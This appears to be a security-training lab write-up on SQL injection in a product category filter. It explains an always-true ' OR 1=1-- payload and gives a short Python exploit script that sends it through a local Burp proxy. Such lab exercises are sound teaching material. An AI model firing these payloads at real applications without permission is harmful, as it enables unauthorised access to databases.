In this lab, I learned how a basic SQL injection vulnerability in a WHERE clause can be abused to bypass filters and retrieve hidden or restricted content. By injecting an always-true condition like ' OR 1=1--, I was able to trick the SQL engine into returning all rows from the product database, regardless of the original query. This is one of the most fundamental SQLi techniques, and itβs eye-opening how something this simple can completely break application logic if input validation is missing.
[+] Start Burp Suite before running the script β it uses a proxy for visibility.
[+] The lab uses a category parameter in the URL to filter products.
[+] This parameter is directly used in a SQL WHERE clause.
[+] The application does not sanitize the input properly.
[+] An SQL injection payload is added to bypass the filter condition.
[+] The payload forces the condition to always be true.
[+] As a result, the server returns all product entries from the database.
[+] The script checks for a known product name in the response to confirm success.
πNote: You may need to update the product name "Folding Gadgets" in the script, depending on
what appears in your specific lab.
python3 exploit.py https://<your-lab-id>.web-security-academy.net
import requests
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
def exploit_sqli(url, payload):
uri = '/filter?category='
r = requests.get(url + uri + payload, verify=False, proxies=proxies)
if "Folding Gadgets" in r.text:
return True
else:
return False
if __name__ == "__main__":
try:
url = sys.argv[1].strip()
payload = "'+OR+1=1--"
except IndexError:
print("[-] Usage: %s <url>" %sys.argv[0])
print('[-] Example: %s www.example.com' % sys.argv[0])
sys.exit(-1)
if exploit_sqli(url, payload):
print("[+] SQL injection successful!")
else:
print("[-] SQL injection unsuccessful")